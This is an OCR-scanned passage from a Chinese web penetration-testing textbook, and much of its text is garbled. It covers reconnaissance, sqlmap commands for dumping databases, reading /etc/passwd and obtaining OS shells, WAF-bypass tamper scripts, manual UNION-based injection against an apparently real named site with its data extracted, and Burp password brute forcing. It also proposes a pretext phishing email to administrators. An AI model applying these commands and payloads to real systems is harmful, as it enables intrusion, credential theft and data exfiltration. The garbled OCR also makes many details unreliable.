| Bye 0522 G BAFER 20506 GFS 256% 











| SWAPE : 3340655. BemoG й 94066. ERO — — O 





memes 
Wa 
мади 








 . Генет: 98M 728K 6728 Ex: 998M TK 6728 
to eme: | Ea: 

ES Eme: 22с TEM MOK 6208 Bis. 2061016м 610K1073B 
ax 

















2232528 ( register clobals] : 





图 3-5 ”PHP 探 针 文件 
(2) 搜索 引擎 。 在 渗透 中 ， 搜 索引 擎 是 一 把 利器 ， 尝 试用 搜索 引擎 的 语法 ， 往 往 会 
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有 意 想不到 的 收获 。 

下 面 是 一 些 常用 的 搜索 引擎 语法 。 

> domain: 用 domain 命 令 可 以 查找 跟 某 一 网 站 的 相关 信息 。 

> filetype: 限制 查找 文件 的 格式 类 型 。 目 前 可 以 查找 的 文件 类 型 有 pdf.doc/ xls pptrtf。 

> inurl: 限定 查询 匹配 只 搜索 URI 链接。 

> link: 网 站 外 链接 查询 。 

> site: 网 站 整 站 搜索 引擎 收录 查询 。 

> intitle: 搜索 网 页 标题 中 含有 的 关键 词 。 

G) 扫描 器 。 对 渗透 目标 用 常见 的 目录 进行 暴力 破解 。 此 方法 往往 对 那些 安全 性 较 
低 的 网 站 有 效 。 

(4) 爬虫 。 怜 虫 在 渗透 中 起 着 很 重要 的 作用 ， 用 来 发 现 一 些 隐蔽 的 目录 。 


3.1.3 Whois 信息 搜集 


Whois 即 域名 查询 协议 ， 是 用 来 查询 域名 的 IP 地 址 以 及 所 有 者 等 信息 的 传输 协议 。 网 
络 上 有 很 多 提供 Whois 查 询 的 平台 ， 如 图 3-6 所 示 ， 将 目标 域名 输入 查询 ， 便 可 以 看 到 目标 
站 点 的 域名 服务 器 、DNS 服 务 器 以 及 其 他 隐私 信息 。 


SEWhos&iRT E 





ersnet xa 





айм} 2015 06 06 20:57, а tips 


Ri: POR LTD. D/B/A PUBLICDOMAINREGISTRY.COM 











ит ТЕРИНИН Mtos)mw canr.org io FERRE TAPRE 


图 3-6 Whois 查询 结果 


3.1.4 “爆破 信息 搜集 


“爆破 ”是 一 种 形象 的 说 法 ， 即 暴力 破解 ， 一 般 使 用 穷 举 或 字典 〈 大 量 数据 集合 ) 列 
举 的 方法 。 在 渗透 测试 中 ， 爆 破 的 作用 非常 重要 。 特 别 是 针对 一 些 大 型 企业 的 内 部 系统 ， 
很 多 员工 为 了 使 用 方便 ， 而 忽略 了 密码 的 安全 性 ， 常 常 使 用 一 些 弱 口令 作为 密码 ， 而 用 户 
名 往往 就 是 其 姓名 或 拼写 。 黑 客 可 能 尝试 利用 搜索 引擎 和 社工 库 对 渗透 目标 的 员工 名 单 进行 
搜集 ， 然 后 进行 密码 字典 生成 和 爆破 。 防 范 这 种 攻击 的 方式 ， 一 是 增加 验证 ， 让 暴力 破解 无 
法 进行 ， 例 如 验证 码 ; 二 是 提高 密码 安全 性 ， 这 在 附录 中 会 详细 探讨 。 
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3.2 SQL 注入 


SQL 注入 曾 在 几 年 前 就 流行 于 世 ， 而 如 今 ，SQL 注 入 仍 是 最 流行 的 攻击 手段 之 一 ， 开 
发 者 们 对 其 伤 透 了 脑筋 。 当 然 ， 主 要 是 由 于 注入 攻击 的 灵活 性 ， 一 个 目的 ， 多 个 语句 ， 多 
个 写法 。 

SQL 注入 可 以 分 为 工具 和 手工 两 类 ， 工 具 因 为 自动 化 ， 常 常会 比 手 工 高 效 很 多 ， 但 因 
为 其 并 不 是 有 针对 性 地 进行 注入 ， 相 比 手 工 注 入 就 局 限 了 很 多 。 


3.2.1 注入 的 挖掘 


一 切 输入 都 可 能 有 危害， 有 参数 的 地 方 省 有 可 能 存在 SQL 注 入 。 而 由 于 浏览 器 的 局 限 性 ， 
常常 会 包 略 一 些 隐藏 链接 、API 调 用 、http 头 中 的 参数 。 那 如 何 进行 全 面 的 SQL 注入 挖掘 呢 ? 

这 里 需要 用 到 工具 Burp。 

由 图 3-7 可 以 看 到 操作 时 向 Web 站 点 发 送 的 每 个 http 数 据 包 。 数 据 包 中 包含 了 http 头 和 
传递 的 参数 ， 而 注入 常常 就 发 生 在 这 些 参数 中 ， 图 3-8 简 单 分 析 了 http 数 据 包 的 结构 〈 大 方 
框 为 http 头 ， 小 方 框 为 参数 ) 。 
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图 3-7 ”对 站 点 操作 时 的 数据 包 
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图 3-8 ”分 析 了 http 数 据 包 的 结构 
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大 致 了 解 了 数据 包 结 构 以 后 ， 便 可 以 开始 进行 注入 的 挖掘 了 。 所 谓 挖 握 ， 就 是 判断 某 
个 参数 是 否 可 以 进行 注入 。 下 面 来 探讨 一 下 常见 的 判断 方法 。 


1. 报错 注入 


一 般 情 况 下 ， 大 部 分 编程 语言 为 了 方便 开发 人 员 可 以 灵活 地 调试 和 修复 其 应 用 程序 ， 
会 使 用 一 些 内 置 的 错误 处 理 库 ， 从 而 简化 调试 程序 的 时 间 。 而 报错 注入 就 是 输入 一 些 特殊 
字符 使 语法 产生 错误 ， 从 而 判断 是 否 存在 注入 ， 常 见 的 特殊 字符 如 下 。 

a» 

(2) \ 

(3); 

(4) %00 

(5) 2 

(6 € 

(7) # 

(8) " 

在 提交 参数 时 加 上 这 些 特 殊 字 符 ， 如 果 报 错 ， 那 么 极 有 可 能 是 一 个 注入 点 ， 如 图 3-9 
所 示 。 
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图 3-9 单 引号 报错 实例 
2 ЕЖ 


何 为 盲 注 ? 其 实 盲 注 和 报错 注入 是 相对 的 ， 报 错 注 入 会 返回 一 些 数据 库 的 具体 信息 ， 
而 盲 注 只 会 返回 true 与 false 两 种 值 ， 从 而 对 想得到 的 信息 进行 猜 解 ， 因 此 相 比 报错 注入 ， 
盲 注 的 效率 较为 低下 。 常 见 的 盲 注 分 为 两 种 ， 布 尔 型 盲 注 和 基于 时 间 的 盲 注 。 这 两 者 的 区 
别 在 于 判断 注入 的 条 件 不 同 。 布 尔 型 盲 注 是 对 页 面 响应 的 信息 进行 判断 ， 而 基于 时 间 的 盲 
注 也 就 是 常 说 的 延迟 注入 ， 是 对 页 面 响应 的 时 间 进 行 判断 。 

对 于 布尔 型 盲 注 ， 在 网 站 默认 关闭 错误 信息 时 ， 如 果 这 时 并 没有 做 其 他 处 理 ， 可 以 
通过 逻辑 表达 式 来 进行 言 注 。 大 概 的 原理 是 : 如 果 笔 者 的 逻辑 表达 式 是 正确 的 ， 整 个 SQL 
查询 语句 一 定 会 返回 结果 ， 那 么 网 站 显示 了 正确 的 内 容 。 基 于 这 个 原理 ， 可 以 通过 注入 依 
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次 获取 每 个 字符 。 常 见 的 判断 方法 中 最 经 典 的 便 是 and 1=1; and 1=2 了 ， 当 提交 and 1=1 时 
页 面 正常 ，and 1=2 时 页 面 不 正常 ， 则 存在 注入 。 不 过 ， 这 种 判断 方法 是 针对 数字 型 参数 
的 ， 与 其 类 似 的 还 有 or 2221; or122; хог 1=1; xor 1=2 等 。 但 对 于 字符 型 参数 ， 常 用 的 
语句 是 ' and '1'= 1 :;'and '1'=2， 其 判断 方法 和 数字 型 相同 。 

对 于 基于 时 间 的 盲 注 ， 一 般 是 在 条 件 更 为 若 刻 的 情况 下 例如 最 终 进行 了 跳 转 ) 使 
用 的 一 种 注入 的 方式 。 以 MySQL 为 例 ， 对 其 的 判断 方法 主要 涉及 sleep 和 benchmark 两 个 函 
数 ， 这 里 以 benchmark 函 数 为 例 进行 介绍 。 

BENCHMARK ( count, expr ) 

其 作用 是 重复 count 次 执行 表达 式 expr， 提 交 后 根据 其 响应 时 间 来 判断 表达 式 正 确 
与 否 ， 是 否 存在 注入 。 当 然 ， 延 迟 注 入 一 般 都 交 给 工具 或 脚本 去 分 析 ， 能 大 大 提高 准确 性 
和 效率 。 
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随 着 注入 攻击 的 流行 ， 市 场 上 工具 的 种 类 也 较为 繁多 。 常 见 的 有 sqlmap、Havij 等 ， 其 
中 sqlmap 因 为 免费 、 开 源 、 功 能 强大 等 特点 ， 受 到 了 广大 使 用 者 的 推崇 。 本 节 便 来 详细 讲 
解 Windows 系 统 下 sqlmap 的 使 用 。 


1. sqlmap 的 安装 


(D sqlmap 需 要 在 Python 环境 下 才能 运行 ， 因 此 在 安装 sqlmap 之 前 需要 安装 Python。 
在 Windows 下 ， 下 载 并 运行 Python 的 安装 包 ，Python 由 于 2.x 版 本 与 3.x 版 本 性 能 上 有 一 定 差 
异 ， 所 以 我 们 使 用 2.7.2 版 本 〈Python 的 版 本 问题 是 个 很 有 趣 的 话题 ， 各 位 如 果 感 兴趣 可 以 
自己 查找 资料 进行 了 解 ) ， 如 图 3-10 所 示 。 

(2) 安装 完成 后 ， 需 要 添加 环境 变量 。 安 装 路 径 是 D: \python， 执 行 “ 我 的 电 
脑 ” 一 “属性 ”命令 ， 打 开 “ 高 级 ”选项 卡 ， 如 图 3-11 所 示 。 























unala Ee 。 | 系统 保护 lam 
要 进行 大 多 赦 更 次 ， 您 必须 作为 管理 员 登 录 。 











© 性 能 
— ийаш, MUSEI. ТИРӘ, CREMAT 
косто 
š | (RES) 
B retal for luoers | тети — 
©) instal just for me (not avalable on Windows Vista) SEETHADARRR 
BED. 





启动 和 元 障 恢复 
_ 系统 启 动 、 系 统 失败 和 调试 信息 
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| Бағы Luma.) |] 
图 3-10 ”Windows 环 境 下 安装 Python 图 3-11 配置 运行 环境 
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(3) 单 击 “ 环 境 变量 ”按钮 ， 在 path 中 添加 D: \python〔 安 装 路 径 ) 并 保存 ， 如 图 
3-12 所 示 。 

(4) Python 安装 配置 完毕 后 ， 下 载 sqlmap 的 压缩 包 并 解压 ， 解 压 路 径 是 D: \python\ 
sqlmap\。 打 开 命令 提示 符 ， 用 cd 命令 切换 到 sqlmap 解 压 路 径 ， 试 着 运行 一 下 sqlmap .py， 检 





[1 
Ei 
E] 
m 
5 


xu [urb |®® ”| 系统 保护 [运程 
| 环境 变量 bd 





BS EA: python - salmeppy 





r PAARE 0 6.1.7681] 
= m ARAVA c oft Corporation。 保 留 所 有 权利 


mg Path 


变 里 值 V) 100\Tools\Binn\WSShell Common? UDEV] 





Path 
РАТКЕХТ 
PROCESSOR AR — уйй 























iion.) (айа) (CD: 
ue жа) | 
图 3-12 ”设置 环境 变量 图 3-13 ”检查 是 否 安装 成 功 


2. sqlmap 的 使 用 

sqlmap 是 一 款 半 自动 化 工具 ， 需 要 手动 输入 命令 进行 注入 。 常 见 的 命令 如 下 这 里 假 
设 目标 URI 为 http:Wurlnews?id=1) 。 

sqlmap.py -u "http://url/news?id=1" --current-user # 获 取 当 前 用 户 名 称 


sqlmap.py -u "http://url/news?id=1" --current-db # 获 取 当 前 数据 库 名 称 
sqlmap.py -u "http://url/news?id=1" --tables -D "db name" # 列 表 名 


sqlmap.py -u "http://url/news?id-1" --columns -T "tablename" 
users-D "db name" -v 0 # 列 字段 

sqlmap.py -u "http://url/news?id-1" --dump -C "column name" -T 
"table name" -D "db name" # 获 取 字 段 内 容 
sqlmap.py -u "http://url/news?id-1" --smart --level 3 --users 


#smart 智 能 level 执行 测试 等 级 
sqlmap.py -u "http://url/news?id=1" --dbms "Mysql" --users 





#dbms 指 定数 据 库 类 型 
sqlmap.py -u "http://url/news?id-1" --users # 列 数据 库 用 户 
sqlmap.py -u "http://url/news?id-1" --dbs # 列 数据 库 
sqlmap.py -u "http://url/news?id-1" --passwords # 数 据 库 用 户 密码 





sqlmap.py -u "http://url/news?id-1" --passwords-U root -v 0 
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# 列 出 指定 用 户 数 据 库 密码 
sqlmap.py -u "http://url/news?id-1" --dump -C "password,user,id" 


-T "tablename" -D "db name" 


start 1 —stop 20 # 列 出 指定 字段 , 列 出 20 条 
sqlmap.py -u "http://url/news?id-1" --dump-all -v 0 
# 列 出 所 有 数据 库 和 表 


sqlmap.py -u "http://url/news?id-1" --privileges # 查 看 权限 
sqlmap.py -u "http://url/news?id-1" --privileges -U "WEB USR" 


# 查 看 指定 用 户 权限 
sqlmap.py -u "http://url/news?id=1" --is-dba -v 1 # 是 否 是 数据 库 管 理 员 
sqlmap.py -u "http://url/news?id-1" --roles # 枚 举 数据 库 用 户 角色 


sqlmap.py -u "http://url/news?id-1" --udf-inject 

# 导 入 用 户 自 定义 函数 ( 获取 系统 权限 ! ) 
sqlmap.py -u "http://url/news?id-1" --dump-all --exclude-sysdbs 
-v 0 # 列 出 当前 库 所 有 表 


Sqlmap.py -u "http://url/news?id-1" --union-cols #union 查询 表 记 录 






sqlmap.py -u "http://url/news?id-1" --cookie "cookie" #cookie 注 入 


sqlmap.py -u "http://url/news?id=1" -b # 获 取 banner 信 息 

sqlmap.py -u "http://url/news?id-1" --data "SearchValue= 请 输入 关键 

字 &sId=1" #post 注 入 

sqlmap.py -u "http://url/news?id=1" -v 1 -f # 指 纹 判 别 数据 库 类 型 

sqlmap.py -u "http://url/news?id-1" --proxy"http://127.0.0.1:8118" 
# 代 理 注入 

sqlmap.py -u "http://url/news?id-1"--string"STRING ON TRUE PAGE" 
HEEX SS 


sqlmap.py -u "http://url/news?id-1" --sqgl-shell 大 执 行 指定 sql 命 令 
sqlmap.py -u "http://url/news?id-1" --file /etc/passwd 
sqlmap.py -u "http://url/news?id-1" --os-cmd-whoami # 执 行 系统 命令 
sqlmap.py -u "http://url/news?id=1" --os-shell Ф959 зһе11 
sqlmap.py -u "http://url/news?id-1" --os-pwn +Б%#з5һе11 
sqlmap.py -u "http://url/news?id=1" --reg-read ”# 读 取 win 系 统 注册 表 
sqlmap.py -u "http://url/news?id-1" --dbs-o "sqlmap.py.log" 
# 保 存 进度 
sqlmap.py -u "http://url/news?id-1" --dbs -o "sqlmap.py.log" --resume 
# 恢 复 已 保存 进度 
sqlmap.py -g "google 语法 "” --dump-all --batch 
#google 搜 索 注入 点 自动 跑 出 所 有 字段 


MI 0 
„839 Мер — жаа MM 





3. 对 WAF 的 绕 过 


在 实际 注入 测试 中 ， 遇 到 WAF (Web Application Firewall， 网 站 应 用 级 入 侵 防御 系 
统 ) 是 常 有 的 事 ， 我 们 可 以 绕 过 WAF 继 续 进行 注入 检测 ， 本 节 讨论 sqlmap 对 WAF 的 绕 过 

在 sqlmap 中 ， 用 -tamper 命 令 可 以 调用 内 置 的 绕 过 脚本 ， 具 体 语 法 格式 如 sqlmap.py -u 
"url" -v 1 --dbs -tamper "脚本 名 "。 表 3-1 是 常用 的 脚本 名 及 作用 。 

表 3-1 sqlmap 常 用 脚本 名 及 其 作用 

equaltolike.py like 代替 等 号 
space2dash.py 绕 过 过 滤 '=' 替换 空格 字符 CO 
greatest.py 绕 过 过 滤 ' >'， 用 GREATEST 替 换 大 于 号 
space2hash.py 空格 替换 为 # 号 、 随 机 字符 串 以 及 换行 符 
appendnullbyte.py 在 有 效 负荷 结束 位 置 加 载 零 字 节 字符 编码 
空格 替换 为 其 他 空 符号 
过 滤 空 格 ， 包 含 完整 的 查询 版 本 注释 
еси 替换 空格 字符 C") C- 后 跟 一 个 破 折 号 注释 一 个 新 行 ('n' ) 
围绕 SQL 关 键 字 添 加 多 个 空格 
bluecoat.py 代替 空格 字符 后 与 一 个 有 效 的 随机 空白 字符 的 SQL 语 句 ， 然 后 蔡 换 = 为 like 


双重 查询 语句 。 取 代 predefined SQL 关键 字 with 表 示 suitable for 替 代 ( 例 
如 replace("SELECT"、""))filters 


space2randomblank.py 代替 空格 字符 CO 从 一 个 随机 的 空白 字符 可 选 字符 的 有 效 集 

sp password.py 追加 sp_password， 从 DBMS 日 志 的 自动 模糊 处 理 的 有 效 载荷 的 末尾 
chardoubleencode.py 双 URI 编码 〈 不 处 理 已 编码 的 

unionalltounion.py 替换 UNION ALL SELECT UNION SELECT 









































nonrecursivereplacement.py 














randomcase.py 随机 大 小 写 
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续 表 
unmagicquotes.py 宽 字 符 绕 过 ОРС addslashes 
charunicodeencode.py 字符 串 Unicode 编码 
securesphere.py 追加 特制 的 字符 串 


versionedmorekeywords.py 注释 绕 过 
halfversionedmorekeywords.py | 关键 字 前 加 注释 
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在 渗透 测试 中 ， 再 强大 的 注入 工具 也 会 有 局 限 性 ， 而 手工 注入 恰恰 能 解决 这 一 弱点 。 
当然 ， 手 工 注 入 需要 渗透 者 对 其 针对 的 数据 库 语 法 有 一 定 了 解 。 不 过 ， 因 为 SQL 注入 的 灵 
活性 与 多 样 性 ， 如 果 详 细 深 入 地 讲 ， 恐 怕 能 单独 写成 一 本 书 。 在 这 里 ， 笔 者 就 选取 最 具 代 
表 性 的 例子 给 大 家 示范 。 

(1) 对 渗透 目标 进行 注入 的 挖掘 ， 这 里 对 挖掘 的 过 程 就 不 再 袭 述 了 。 确 定 了 注入 
点 ， 便 可 以 开始 进行 注入 测试 了 ， 如 图 3-14 所 示 。 


ontent-Length: 13 
'ookie: Database error 
Hm lvt 972348Sel9fl£3eBeSi8ca£94eSSScbS-1435891281; ff | --—-- 

[im 1pvt 9723485e19f163e8e518ca£94e959cb971435891445; 
[ine ima*73kaS2rqssc12t. h21vrs0; 

дад4стоуобпд1һ41; 



























| SQL: SELECT 'aws topic .+ FROM 'aws_topic WHERE ( 
topic title = ''7) ORDER BY topic id  ASC 










roNbHlerv2NPR 
nc-VWrpPbySvV Error Message: Mysqli prepare error: You have an error 
in your SQL syntax: check the manual that corresponds 
to your MySQL server version for the right syntax to 
use near '''') ORDER BY "topic id ASC' at line 1 






exception 'Zend Db Statement Mysqli Exception! with 
message 'Mysqli prepare error: You have an error in 
your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use 
near '''') ORDER BY "topic id' ASC' at line 1' in 
[data/www/ask. iheima. com/system/Zend/Db/Statement /Mysql. 
i.php:77 

Stack trace: 

o 


图 3-14 MySQL 查 询 语句 示例 
注意 : 这 里 用 到 了 Burp 的 repeater 功 能 。 
由 图 3-14 可 以 看 到 POST 下 的 参数 topic_title 存 在 报错 注入 ， 这 里 提交 了 单 引号 ， 返 回 
了 错误 信息 。 
错误 信息 中 返回 了 出 错 的 查询 语句 如 下 : 


ache-Control: no-cache 


Fopic_title=' 








SELECT 'aws topic'.* FROM 'aws topic' WHERE ( topic title = ''') ORDER 
BY 'topic па" ASC 


(2) 这 是 一 条 MySQL 查 询 语句 。 再 来 看 看 提交 的 数据 位 于 语句 的 什么 位 置 ， 提 交 
xx'"， 可 以 看 到 查询 语句 如 下 : 
SELECT 'aws topic'.* FROM 'aws topic' WHERE ( topic title = 'xx'') 


ORDER BY 'topic id' ASC 
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(3) 确定 了 提交 的 数据 所 处 位 置 ， 便 可 以 用 闭合 语句 试 试 。 假 设 这 里 提交 的 是 xx') 
#， 于 是 查询 语句 就 变 成 了 : 

SELECT 'aws topic'.* FROM 'aws topic' WHERE ( topic title 

ORDER BY 'topic id' ASC 

而 # 在 MySQL 中 是 注释 符 ， 所 以 实际 上 查询 语句 变 成 了 : 

SELECT 'aws topic'.* FROM 'aws topic' WHERE ( topic title -'xx') 


(4) 成 功 闭合 。 因 此 构造 的 语句 格式 应 该 是 


') “注入 语句 # 


кх) Eg a) 


C5) 知道 注入 语句 的 格式 了 ， 再 来 看 看 查询 语句 本 身 ， 因 为 是 在 WHERE 后 面 ， 所 以 
只 能 用 联合 查询 或 者 盲 注 进行 注入 。 先 用 ORDER BY 进行 猜 解 ， 可 以 看 到 ORDER BY 16 
时 正常 返回 ， 而 ORDER BY 17 时 报错 。 因 此 可 以 构造 : 

20) UNION SELECT L,2,3,47576;7,8,9.10,1171271537147 15; L6 E 


如 图 3- AM 提交 后 正常 返回 ， 因 此 可 以 判断 是 支持 联合 查询 的 。 








кез": ("оріс id*:* 





1521" "topic title':" 
[im 1vt 9723485е197163е8е518са94е959с9=1435891291; * 

[im 1pvt 9723485e19f163eBeS18ca£94e959cb971435891445; 

[ihe ima*73kaS2rqsSt12tBtnBEh2 ivr sO; 

kr: Session-s £ 1gqqaq4cmovo0ng1h41; 

[trz user logi I18rj1NPLwNSj4crOlfLMyoyvoNbHlerv2NPR 
:NeOm&Sul8yYv7DZzMTRnuDJyc blZ-dxduvysfOnN Fnc-WrpPbySvW 
oyfnLKomoyvoLunwNSjttDnz-bPxpqq: 
INZZDATA100052461671204303738-1435886381-httpY253AV2 52 FV 
S2Fwwv. iheima. comt 252F47C1435886381 







onnection: keep-alive 
ragma: no-cache 
ache-Control: no-cache 


opic_title=') UNION SELECT 
l1, 2,374,5,6,7,8,9,10, 11,12, 13,14,15,1€ B 








图 3-15 ”联合 查询 
(6) 用 user()、database() 等 函数 代 进 去 查询 试 试 。 
') UNION SELECT user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 # 


提交 后 ， 结 果 如 图 3-16 所 示 。 


Pragma: no-cache 
Content-Length: 583 


("status" rii ":"1521","topic title":" 
","add time "1","topic de 
scription": ш] x ,"topic lock" :0,"focus coun 
":"ask@ .  .61.105","topic title":"2","add time": "3^, Ñ 


discuss count":"4","topic description":"5", "topic ] pic": 
men, type" :"15","sort":"16"]] ,"info":"Yu6210Yu529f" ) 


图 3-16 ”查询 数据 库 用 户 名 
可 以 看 到 user 为 ask@*.*.61.105， 再 将 user(0 替 换 成 database0 试 试 。 
如 图 3-17 所 示 ， 这 里 可 以 看 到 数据 库 为 ask， 接 下 来 继续 爆破 表 名 。 构 造 : 
') union select group concat (distinct table name), 2,3,4,5,6,7,8,9,10, 
11,12,13,14,15,16 frm infommation schema.tables where table schema-database() # 


33 
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Pragma: no-cache 


Content-Length: 570 





("status": 
" "add time 








: topic title 
:"4","topic description" 
,"info":"iu6210iu529f" } 


5" "sort 





1","res":[("topic id':"1521","topic title":" 
:"1421635405","discuss count"':"1 





topic de 
Лоск" :0,"Ғосиѕ coun 

3","discuss ' count 
gs ,"topic | pic':'6* ,"topic 10 


' "topi 








图 3-17 ”查询 数据 库 名 


提交 后 ， 如 图 3-18 所 示 ， 可 以 看 到 表 名 已 经 在 返回 的 信息 中 了 。 


Pragma: no-cache 
Content-Length: 908 


("status":"1","res 
05","discuss count 


ull,"icon":null,"pid":0,"type 





dd time":"14216354 
¿"topic lock":0 





question","sort':0),("topic id':"aws active d 


e comments,aws article vote,aws attach,aws category,aws draft,aws edm task,aw 


edm taskdata,aws edm userdata,aws edm usergroup,aws education experience , aw 








'Orite,aws favorite tag,aws feature,aws fea", "topic . title 
10","merged id 
"sort" :"16")] "info" 





11","seo title":"12","icon":"13","pid":"1 





图 3-18 ”成功 返回 表 名 


将 表 名 整理 出 来 ， 可 以 清楚 地 看 到 表 结 构 ， 如 图 3-19 所 示 。 


aws_active data 

aws answer| 

aws answer comments 

aws answer thanks 

aws answer uninterested 
aws answer vote 

aws approval 

aws active data 

aws answer 

aws answer comments 

aws answer thanks 

aws answer uninterested 
aws answer vote 

aws approval 

aws article 

aws article comments 
aws article vote 

aws attach 

aws category 

aws draft 

aws edm task 

aws edm taskdata 

aws edm userdata 

aws edm usergroup 

aws education experience 
aws favorite 

aws favorite tag 

aws feature 

aws fea 


3-19 ” 表 结 构 示意 图 





2","add time" 
,"type" 


"15", 


选 一 个 表 进 行 爆 破 字段 ， 这 里 选 的 是 aws_edm_userdata， 其 hex 值 为 0x6177735f65646d 
5f7573657264617461， 因 此 构造 如 下 语句 : 


') +union+select+1, group_concat ( distinct+column name) о 3, 4, 


Ss бу 73 85 9; 10, 11; 


12, 13, 14, 15, 16+from+information_schema. 


columns+where+table name-0x6177735f65646d5f7573657264617461 # 
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结果 如 图 3-20 所 示 。 


gma: no-cache 
tent-Length: 585 






l! ","discuss 
оріс lock':"7","focus count":"8","user relatec 


3-20 ”返回 字段 
从 结果 中 可 以 看 到 存在 id、usergroup 、email 三 个 字段 ， 这 里 只 暴露 出 email 字 段 的 
数据 ， 提 交 如 下 语句 : 
') +union+select+1, group_concat (email, 0x2B), 3, 4, 5, 6, 7, 8, 9, 


10, 11, 12, 13, 14, 15, 16 +fromtaws edm userdata # 


结果 如 图 3-21 所 示 。 
("status":"1","res":[("topic id':"1521","topic title":"","add time":"1421 
"topic description':"","topic pic":"","topic lock':0,"focus count"':0,"us 
ull, 


,2710275 
"6","topic lock":"7","focus count":"8","user related":"9","url token":"10 
1e" :"12" ,"1con" : "13", "рій" :* 14" ," type" : "15" ,"sort" :" 16" )] ," info" : "\16210\ 


图 3-21 注入 结果 


3.24 注入 延伸 


在 注入 中 经 常会 碰 到 的 一 种 情况 就 是 : 注入 得 到 的 加 密 过 的 密 文 却 解 不 开 。 对 于 此 问 
题 ， 在 这 里 讲解 几 种 可 行 的 办 法 。 

(1) 利用 国外 的 搜索 引擎 ， 往 往 会 有 意 想不到 的 收获 ， 最 常见 的 是 Google。 

(2) 用 Whois 查 出 管理 员 邮 箱 ， 然 后 发 一 份 邮件 通知 管理 员 ， 让 其 更 改 密码 。 邮 
件 内 容 无 非 类 似 于 “我 们 是 xxx 检 测 中 心 ， 您 的 网 站 存在 风险 ， 请 立即 修改 管理 员 密 





(3) 分 析 Cookie。 有 时 加 密 过 的 密 文 会 出 现在 Cookie 里 ， 对 于 这 种 情况 ， 直 接 用 管 
理 员 的 密 文 蔡 换 原来 Cookie 中 的 密 文 即 可 。 

(4) 在 特定 的 注入 环境 下 ， 有 时 候 可 以 用 新 密 文 替 换 掉 原来 的 密 文 。 当 然 ， 这 种 方 
法 的 执行 条 件 比 较 苛刻 ， 在 实际 中 较 少 碰见 。 

(5) 利用 找 回 密码 功能 。 常 见 的 是 利用 密 保 问题 找 回 密码 ， 对 于 这 种 情况 ， 可 以 将 
密 保 问题 答案 注入 出 来 ， 然 后 利用 找 回 密码 功能 成 功 登 录 目 标 账 户 。 

Сб) 逻辑 缺陷 。 例 如 有 些 登录 功能 、 修 改 找 回 密码 功能 ， 在 数据 包 中 直接 用 密 文 传 
输 。 这 时 ， 就 可 以 用 得 到 的 密 文 进行 替换 ， 从 而 进行 登录 、 更 改 密码 等 操作 。 
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3.3.1 利用 Burp 进 行 爆破 


Burp 是 Web 渗 透 中 用 于 爆破 的 最 常用 的 工具 ， 其 操作 极其 简单 ， 只 需要 简单 几 步 即 可 
实现 爆破 : 抓 包 ， 设 置 变量 ， 加 载 字 典 进行 攻击 ， 返 回信 息 。 本 节 具 体 讲述 如 何 操作 。 

CD 对 浏览 器 的 代理 进行 设置 ， 具体 过 程 这 里 就 不 阐述 了 。 设 置 完 毕 后 ， 打 开 目 标 

(2) 如 图 3-22 所 示 ， 这 里 随意 使 用 用 户 名 admin， 密 码 123456 登 录 ， 登 录 失败 。 在 
Burp 中 可 以 看 到 刚才 登录 操作 的 数据 包 ， 如 图 3-23 所 示 。 





图 3-22 目标 爆破 页 面 
G) 单 击 Burp 工 具 界 面 右上 角 的 Action 按 钮 ， 可 以 看 到 如 图 3-24 所 示 的 下 拉 菜 单 栏 。 
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| Prenous | | Nee | Асап | Do an active scan 
| Do a passive scan 
| Send to Intruder син 
| Send to Repeater Синя 
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Send to Sequencer 
Send to Comparer. 
Send to Decoder 





Show response in browser 





Request in browser 
Engagement tools B 
Copy URL 





! Сор си+с 
Paste Cis 
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图 3-23 ”登录 操作 发 送 的 数据 包 С 083.24 Action 下 拉 菜单 栏 
(4) 选择 Send to Intuder， 单 击 该 命令 后 回 到 Bump 的 主 界面 ， 如 图 3-25 所 示 ， 可 以 看 到 主 
界面 的 Intruder 选 项 卡 会 加 亮 显示 。 
(5) 切换 到 Intruder 选 项 卡 ， 单 击 Positions 选 项 ， 如 图 3-26 所 示 ， 可 以 看 到 刚才 抓 到 
的 数据 包 。 


Message editor һәр 




















Proxy history help 
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Вир Intruder Repeater Window Help 


[тазе | Proxy [ Spider | Scanner | ise | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts | 




















Intercept Options 

















Filter. Hiding CSS, image and general binary content 











# [Host | Method | URL |Params Edited | Status | Length | MIME t... | Extensi 
1 httpJ//123.24948.9 [POST | togin/LoginVerify?Length- [°] ПП 200 335 











3-25 ”数据 包 成 send to intruder 
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图 3-26 ”登录 包 
(6) 可 以 看 到 数据 包 中 有 些 字符 被 标注 起 来 了 ， 这 是 Burp 对 变量 的 自动 判断 并 标注 。 
单 击 Clear $ 按钮 ， 这 里 只 对 密码 进行 字典 替换 ， 所 以 选中 123456， 然 后 单 击 Add $ 按钮 。 
(7) 如 图 3-27 所 示 ， 此 时 123456 已 经 被 设 为 变量 了 ， 接 下 来 只 需 加 载 字典 文件 ， 对 
其 进行 替换 ， 并 提交 数据 包 就 可 以 进行 爆破 了 。 选 中 Payloads 选 项 卡 ， 单 击 Load 按 钮 ， 进 
行 字典 文件 的 加 载 。 


Content-Length: 29 








UserHame «admi n cUsec Pvd- ШИШЕ 














E less on] [e | Te г search tem 0 matches| 
图 3-27 ”设置 爆破 变量 
(8) 如 图 3-28 所 示 ， 字 典 文件 加 载 完 毕 ， 便 可 以 进行 爆破 了 。 选 中 最 上 方 Intruder 选 
项 卡 ， 单 击 Start attack 命 令 ， 如 图 3-29 所 示 。 
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图 3-28 ”字典 文件 成 功 加 载 
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图 3-29 ”准备 开始 爆破 

(9) 这 时 可 以 看 到 返回 信息 在 不 停 滚动 。 待 字典 跑 完 后 ， 分 析 返 回 数据 Length， 找 
出 正确 密码 。 如 图 3-30 所 示 ， 是 目标 站 点 的 爆破 结果 ， 可 以 看 到 除了 admin 返 回 的 Length 
是 370， 其 他 的 都 是 354， 因 此 判断 admin 为 正确 密码 。 
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File. Showng all items 图 
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a5 admin 20 g а m 
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7 dminabc 200 е B s 
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Response 

[Ras Parame | Headers | Hox 

РОСТ /Login/LogiaVerify?Lengtk-S ПТТР/ 




















图 3-30 ”爆破 结束 
Tips: 可 以 通过 Length 值 的 排序 来 快速 找 出 数值 不 同 的 项 。 
当然 ， 如 今 很 多 Web 站 点 都 有 验证 码 。 但 是 ， 验 证 码 依旧 存在 被 绕 过 的 风险 ， 利 用 
Python Image Library、Tesseract-OCR、pytesser 这 几 个 Python 第 三 方 库 ， 仅 二 值 化 、 文 字 分 
